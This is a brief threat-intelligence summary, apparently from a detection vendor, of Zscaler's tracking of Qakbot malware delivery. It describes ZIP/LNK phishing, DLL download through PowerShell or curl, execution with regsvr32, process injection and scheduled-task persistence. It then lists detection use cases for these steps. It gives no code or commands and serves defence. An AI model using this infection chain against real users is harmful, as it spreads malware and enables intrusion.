Qakbot Attacks Increasing with the Use of New Techniques

Industry: N/A | Level: Tactical | Source: Zscaler

Tracking of the Qakbot/Qbot malware by Zscaler has discovered an increase in the distribution of Qakbot with new techniques over the past six months. Zscaler describes the evolving techniques used by threat actors to distribute Qakbot "Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0 to trick victims into downloading malicious attachments that install Qakbot." Initial access from Qakbot has typically involved a phishing email delivering a compressed ZIP file containing a malicious Office document, or LNK file to facilitate the download of the Qakbot DLL through PowerShell or Curl. Native binaries such as regsvr32 or rundll32 would be used to execute the Qakbot DLL. Following its execution, the malware would inject itself into a process such as explorer.exe, create persistence with a scheduled task, and connect to its C2.

Anvilogic Scenario:

• Qakbot/Qbot Zip/LNK File Delivery to Initial Infection
• Malicious Document Delivering Malware

Anvilogic Use Cases:

• Malicious Document Execution
• Compressed File Execution
• Symbolic OR Hard File Link Created
• Invoke-WebRequest Command
• regsvr32 Execution